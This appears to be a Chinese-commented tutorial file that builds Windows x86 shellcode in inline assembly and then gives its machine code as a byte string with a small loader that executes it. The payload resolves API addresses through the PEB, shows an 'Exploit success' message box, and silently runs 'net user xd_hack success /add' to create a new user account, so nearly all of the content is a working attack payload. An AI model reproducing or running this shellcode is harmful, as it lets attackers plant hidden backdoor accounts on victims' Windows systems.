#include <stdio.h> //#include <WINDOWS.H> #include <string.h> void main(int argc, char **argv) { _asm { push ebp //压入ebp mov ebp,esp sub esp,0x28 //申请10*4个空间保存临时结果 //------------------------------------------------------------------------ //找到kernel32.dll的基地址,本机为0x7C800000 push ebp mov ebp,esp xor ecx,ecx mov esi,fs:0x30 mov esi,[esi + 0x0C] mov esi,[esi + 0x1C] next_module: mov ebp,[esi + 0x08] mov edi,[esi + 0x20] mov esi,[esi] cmp [edi+0x18],cl jne next_module mov edi,ebp //baseAddr of Kernel32.dll pop ebp //------------------------------------------------------------------------ //保存kernel32.dll的基地址,用于查找其他API mov [ebp - 0xC],edi //找到kernel32.dll的基地址,本机为0x7C800000 //------------------------------------------------------------------------ mov eax,[edi + 3ch] //IMAGE_DOS_HEADER->e_lfanew mov edx,[edi + eax + 78h] //_IMAGE_OPTIONAL_HEADER->IMAGE_DATA_DIRECTORY->VirtualAddress 导出表的RVA add edx,edi //_IMAGE_EXPORT_DIRECTORY导出表的首地址 mov ecx,[edx + 18h] //_IMAGE_EXPORT_DIRECTORY->NumberOfNames mov ebx,[edx + 20h] //_IMAGE_EXPORT_DIRECTORY->AddressOfNames add ebx,edi //AddressOfName search: dec ecx mov esi,[ebx+ecx*4] add esi,edi mov eax,0x50746547 //PteG("GetP") cmp [esi],eax jne search mov eax,0x41636f72 //Acor("rocA") cmp [esi+4],eax jne search mov ebx,[edx + 24h] add ebx,edi; //index address mov cx,[ebx + ecx*2] mov ebx,[edx + 1ch] add ebx,edi mov eax,[ebx + ecx*4] add eax,edi //------------------------------------------------------------------------ //保存GetProcAddress的地址 其值为:0x7C80 AE30 mov [ebp-0x8],eax //------------------------------------------------------------------------ //找到LoadLibraryA的地址 mov edi,[ebp - 0xC] //获得kernel32.dll的基地址 mov eax,[edi + 3ch] //IMAGE_DOS_HEADER->e_lfanew mov edx,[edi + eax + 78h] //_IMAGE_OPTIONAL_HEADER->IMAGE_DATA_DIRECTORY->VirtualAddress 导出表的RVA add edx,edi //_IMAGE_EXPORT_DIRECTORY导出表的首地址 mov ecx,[edx + 18h] //_IMAGE_EXPORT_DIRECTORY->NumberOfNames mov ebx,[edx + 20h] //_IMAGE_EXPORT_DIRECTORY->AddressOfNames add ebx,edi //AddressOfName find_loadlibrary: dec ecx mov esi,[ebx + ecx*4] add esi,edi; mov eax,0x64616F4C //Load("daoL") cmp [esi],eax jne find_loadlibrary mov eax,0x7262694C //Libr("rbiL") cmp [esi+4],eax jne find_loadlibrary mov eax,0x41797261 //aryA("Ayra") cmp [esi+8],eax jne find_loadlibrary mov ebx,[edx+24h] add ebx,edi; //index address mov cx,[ebx+ecx*2] mov ebx,[edx+1ch] add ebx,edi mov eax,[ebx+ecx*4] add eax,edi //eax 中保存LoadLibrary的地址 //------------------------------------------------------------------------ //保存LoadLibraryA的地址 本机值为0x7c801d7b mov [ebp - 0x4],eax //------------------------------------------------------------------------ //LoadLibraryA("user32.dll") mov eax,[ebp-0x4] push ebp mov ebp,esp xor ebx,ebx push ebx push ebx push ebx mov byte ptr[ebp-0xC],0x75 // 75 73 65 72 33 32 2E 64 6C 6C mov byte ptr[ebp-0xB],0x73 mov byte ptr[ebp-0xA],0x65 mov byte ptr[ebp-0x9],0x72 mov byte ptr[ebp-0x8],0x33 mov byte ptr[ebp-0x7],0x32 mov byte ptr[ebp-0x6],0x2E mov byte ptr[ebp-0x5],0x64 mov byte ptr[ebp-0x4],0x6C mov byte ptr[ebp-0x3],0x6C lea ebx,[ebp-0xC] push ebx //push "user32.dll" call eax add esp,0xC pop ebp //------------------------------------------------------------------------ //保存user32.dll 的HMODULE mov [ebp-0x18],eax //------------------------------------------------------------------------ mov eax,[ebp-0x18] //user32.dll->hModule mov edx,[ebp-0x8] //edx->GetProcAddress //获得MessageBoxA的地址 push ebp mov ebp,esp //edx->GetProcAddress(user32.dll->eax,MessageBoxA->ebx) xor ebx,ebx push ebx push ebx push ebx // 4D 65 73 73 61 67 65 42 6F 78 41 mov byte ptr[ebp-0xc],0x4D mov byte ptr[ebp-0xb],0x65 mov byte ptr[ebp-0xa],0x73 mov byte ptr[ebp-0x9],0x73 mov byte ptr[ebp-0x8],0x61 mov byte ptr[ebp-0x7],0x67 mov byte ptr[ebp-0x6],0x65 mov byte ptr[ebp-0x5],0x42 mov byte ptr[ebp-0x4],0x6F mov byte ptr[ebp-0x3],0x78 mov byte ptr[ebp-0x2],0x41 lea ebx,[ebp-0xc] push ebx push eax call edx add esp,0xC pop ebp //------------------------------------------------------------------------ //保存MessageBoxA的地址 本机为77D507EA mov [ebp-0x1c],eax //------------------------------------------------------------------------ //弹出一个消息框 MessageBoxA(0,"Exploit success","Overflow",0) push ebp mov ebp,esp xor ebx,ebx xor edx,edx push ebx push ebx push ebx push ebx push ebx // 45 78 70 6C 6F 69 74 20 73 75 63 63 65 73 73 mov byte ptr[ebp-0x10],0x45 mov byte ptr[ebp-0x0f],0x78 mov byte ptr[ebp-0xe],0x70 mov byte ptr[ebp-0xd],0x6C mov byte ptr[ebp-0xc],0x6f mov byte ptr[ebp-0xb],0x69 mov byte ptr[ebp-0xa],0x74 mov byte ptr[ebp-0x9],0x20 mov byte ptr[ebp-0x8],0x73 mov byte ptr[ebp-0x7],0x75 mov byte ptr[ebp-0x6],0x63 mov byte ptr[ebp-0x5],0x63 mov byte ptr[ebp-0x4],0x65 mov byte ptr[ebp-0x3],0x73 mov byte ptr[ebp-0x2],0x73 lea ebx,[ebp-0x10] //push "Overflow" push 0x776F6C66 push 0x7265764F mov edx,esp //MessageBoxA(0,ebx,edx,0) push 0 push edx push ebx push 0 call eax add esp,0x1c pop ebp //------------------------------------------------------------------------ //求WinExec的地址 //eax->GetProcAddress(edx->kernel32.dll,ebx->WinExec) mov eax,[ebp-0x8] mov edx,[ebp-0xc] push ebp mov ebp,esp xor ebx,ebx push ebx push ebx // 57 69 6E 45 78 65 63 mov byte ptr[ebp-0x8],0x57 mov byte ptr[ebp-0x7],0x69 mov byte ptr[ebp-0x6],0x6e mov byte ptr[ebp-0x5],0x45 mov byte ptr[ebp-0x4],0x78 mov byte ptr[ebp-0x3],0x65 mov byte ptr[ebp-0x2],0x63 lea ebx,[ebp-0x8] push ebx push edx call eax add esp,0x08 pop ebp //------------------------------------------------------------------------ //保存WinExec的地址 mov [ebp-0x10],eax //------------------------------------------------------------------------ //WinExec("net user xd_hack success /add",SW_HIDE) mov eax,[ebp-0x10] push ebp mov ebp,esp xor ebx,ebx push ebx push ebx push ebx push ebx push ebx push ebx push ebx push ebx // 6E 65 74 20 75 73 65 72 20 78 64 5F 68 61 63 6B 20 73 75 63 63 65 73 73 20 2F 61 64 64 mov byte ptr[ebp-0x20],0x6E mov byte ptr[ebp-0x1f],0x65 mov byte ptr[ebp-0x1e],0x74 mov byte ptr[ebp-0x1d],0x20 mov byte ptr[ebp-0x1c],0x75 mov byte ptr[ebp-0x1b],0x73 mov byte ptr[ebp-0x1a],0x65 mov byte ptr[ebp-0x19],0x72 mov byte ptr[ebp-0x18],0x20 mov byte ptr[ebp-0x17],0x78 mov byte ptr[ebp-0x16],0x64 mov byte ptr[ebp-0x15],0x5f mov byte ptr[ebp-0x14],0x68 mov byte ptr[ebp-0x13],0x61 mov byte ptr[ebp-0x12],0x63 mov byte ptr[ebp-0x11],0x6b mov byte ptr[ebp-0x10],0x20 mov byte ptr[ebp-0x0f],0x73 mov byte ptr[ebp-0x0e],0x75 mov byte ptr[ebp-0x0d],0x63 mov byte ptr[ebp-0x0c],0x63 mov byte ptr[ebp-0x0b],0x65 mov byte ptr[ebp-0x0a],0x73 mov byte ptr[ebp-0x09],0x73 mov byte ptr[ebp-0x08],0x20 mov byte ptr[ebp-0x07],0x2f mov byte ptr[ebp-0x06],0x61 mov byte ptr[ebp-0x05],0x64 mov byte ptr[ebp-0x04],0x64 lea ebx,[ebp-0x20] push 0 push ebx call eax add esp,0x20 pop ebp //------------------------------------------------------------------------ //求ExitProcess的地址 //eax->GetProcAddress(edx->kernel32.dll,ebx->ExitProcess) mov eax,[ebp-0x8] mov edx,[ebp-0xc] push ebp mov ebp,esp xor ebx,ebx push ebx push ebx push ebx // 45 78 69 74 50 72 6F 63 65 73 73 mov byte ptr[ebp-0xc],0x45 mov byte ptr[ebp-0xb],0x78 mov byte ptr[ebp-0xa],0x69 mov byte ptr[ebp-0x9],0x74 mov byte ptr[ebp-0x8],0x50 mov byte ptr[ebp-0x7],0x72 mov byte ptr[ebp-0x6],0x6f mov byte ptr[ebp-0x5],0x63 mov byte ptr[ebp-0x4],0x65 mov byte ptr[ebp-0x3],0x73 mov byte ptr[ebp-0x2],0x73 lea ebx,[ebp-0xc] push ebx push edx call eax add esp,0xc pop ebp //------------------------------------------------------------------------ //退出程序 //平衡最开始申请的堆栈空间 add esp,0x28 pop ebp push 0 call eax //------------------------------------------------------------------------ //add esp,0x28 //堆栈平衡 //pop ebp //弹出ebp } }
对应的机器码
#include <stdio.h> //printf #include <string.h> //strlen char shellcode[] = "\x55\x8B\xEC\x83\xEC\x28\x55\x8B\xEC\x33\xC9\x64\x8B" "\x35\x30\x00\x00\x00\x8B\x76\x0C\x8B\x76\x1C\x8B\x6E\x08\x8B\x7E\x20\x8B\x36" "\x38\x4F\x18\x75\xF3\x8B\xFD\x5D\x89\x7D\xF4\x8B\x47\x3C\x8B\x54\x07\x78\x03" "\xD7\x8B\x4A\x18\x8B\x5A\x20\x03\xDF\x49\x8B\x34\x8B\x03\xF7\xB8\x47\x65\x74" "\x50\x39\x06\x75\xF1\xB8\x72\x6F\x63\x41\x39\x46\x04\x75\xE7\x8B\x5A\x24\x03" "\xDF\x66\x8B\x0C\x4B\x8B\x5A\x1C\x03\xDF\x8B\x04\x8B\x03\xC7\x89\x45\xF8\x8B" "\x7D\xF4\x8B\x47\x3C\x8B\x54\x07\x78\x03\xD7\x8B\x4A\x18\x8B\x5A\x20\x03\xDF" "\x49\x8B\x34\x8B\x03\xF7\xB8\x4C\x6F\x61\x64\x39\x06\x75\xF1\xB8\x4C\x69\x62" "\x72\x39\x46\x04\x75\xE7\xB8\x61\x72\x79\x41\x39\x46\x08\x75\xDD\x8B\x5A\x24" "\x03\xDF\x66\x8B\x0C\x4B\x8B\x5A\x1C\x03\xDF\x8B\x04\x8B\x03\xC7\x89\x45\xFC" "\x8B\x45\xFC\x55\x8B\xEC\x33\xDB\x53\x53\x53\xC6\x45\xF4\x75\xC6\x45\xF5\x73" "\xC6\x45\xF6\x65\xC6\x45\xF7\x72\xC6\x45\xF8\x33\xC6\x45\xF9\x32\xC6\x45\xFA" "\x2E\xC6\x45\xFB\x64\xC6\x45\xFC\x6C\xC6\x45\xFD\x6C\x8D\x5D\xF4\x53\xFF\xD0" "\x83\xC4\x0C\x5D\x89\x45\xE8\x8B\x45\xE8\x8B\x55\xF8\x55\x8B\xEC\x33\xDB\x53" "\x53\x53\xC6\x45\xF4\x4D\xC6\x45\xF5\x65\xC6\x45\xF6\x73\xC6\x45\xF7\x73\xC6" "\x45\xF8\x61\xC6\x45\xF9\x67\xC6\x45\xFA\x65\xC6\x45\xFB\x42\xC6\x45\xFC\x6F" "\xC6\x45\xFD\x78\xC6\x45\xFE\x41\x8D\x5D\xF4\x53\x50\xFF\xD2\x83\xC4\x0C\x5D" "\x89\x45\xE4\x55\x8B\xEC\x33\xDB\x33\xD2\x53\x53\x53\x53\x53\xC6\x45\xF0\x45" "\xC6\x45\xF1\x78\xC6\x45\xF2\x70\xC6\x45\xF3\x6C\xC6\x45\xF4\x6F\xC6\x45\xF5" "\x69\xC6\x45\xF6\x74\xC6\x45\xF7\x20\xC6\x45\xF8\x73\xC6\x45\xF9\x75\xC6\x45" "\xFA\x63\xC6\x45\xFB\x63\xC6\x45\xFC\x65\xC6\x45\xFD\x73\xC6\x45\xFE\x73\x8D" "\x5D\xF0\x68\x66\x6C\x6F\x77\x68\x4F\x76\x65\x72\x8B\xD4\x6A\x00\x52\x53\x6A" "\x00\xFF\xD0\x83\xC4\x1C\x5D\x8B\x45\xF8\x8B\x55\xF4\x55\x8B\xEC\x33\xDB\x53" "\x53\xC6\x45\xF8\x57\xC6\x45\xF9\x69\xC6\x45\xFA\x6E\xC6\x45\xFB\x45\xC6\x45" "\xFC\x78\xC6\x45\xFD\x65\xC6\x45\xFE\x63\x8D\x5D\xF8\x53\x52\xFF\xD0\x83\xC4" "\x08\x5D\x89\x45\xF0\x8B\x45\xF0\x55\x8B\xEC\x33\xDB\x53\x53\x53\x53\x53\x53" "\x53\x53\xC6\x45\xE0\x6E\xC6\x45\xE1\x65\xC6\x45\xE2\x74\xC6\x45\xE3\x20\xC6" "\x45\xE4\x75\xC6\x45\xE5\x73\xC6\x45\xE6\x65\xC6\x45\xE7\x72\xC6\x45\xE8\x20" "\xC6\x45\xE9\x78\xC6\x45\xEA\x64\xC6\x45\xEB\x5F\xC6\x45\xEC\x68\xC6\x45\xED" "\x61\xC6\x45\xEE\x63\xC6\x45\xEF\x6B\xC6\x45\xF0\x20\xC6\x45\xF1\x73\xC6\x45" "\xF2\x75\xC6\x45\xF3\x63\xC6\x45\xF4\x63\xC6\x45\xF5\x65\xC6\x45\xF6\x73\xC6" "\x45\xF7\x73\xC6\x45\xF8\x20\xC6\x45\xF9\x2F\xC6\x45\xFA\x61\xC6\x45\xFB\x64" "\xC6\x45\xFC\x64\x8D\x5D\xE0\x6A\x00\x53\xFF\xD0\x83\xC4\x20\x5D\x8B\x45\xF8" "\x8B\x55\xF4\x55\x8B\xEC\x33\xDB\x53\x53\x53\xC6\x45\xF4\x45\xC6\x45\xF5\x78" "\xC6\x45\xF6\x69\xC6\x45\xF7\x74\xC6\x45\xF8\x50\xC6\x45\xF9\x72\xC6\x45\xFA" "\x6F\xC6\x45\xFB\x63\xC6\x45\xFC\x65\xC6\x45\xFD\x73\xC6\x45\xFE\x73\x8D\x5D" "\xF4\x53\x52\xFF\xD0\x83\xC4\x0C\x5D\x83\xC4\x28\x5D\x6A\x00\xFF\xD0\x5F\x5E" "\x5B\x5D\xC3"; int main(int argc, char **argv) { int (*func)(); func = (int (*)()) &shellcode; printf("Shellcode Length is : %x \n",strlen(shellcode)); (int)(*func)(); }
返回长度不对,实际长度为
700个字节。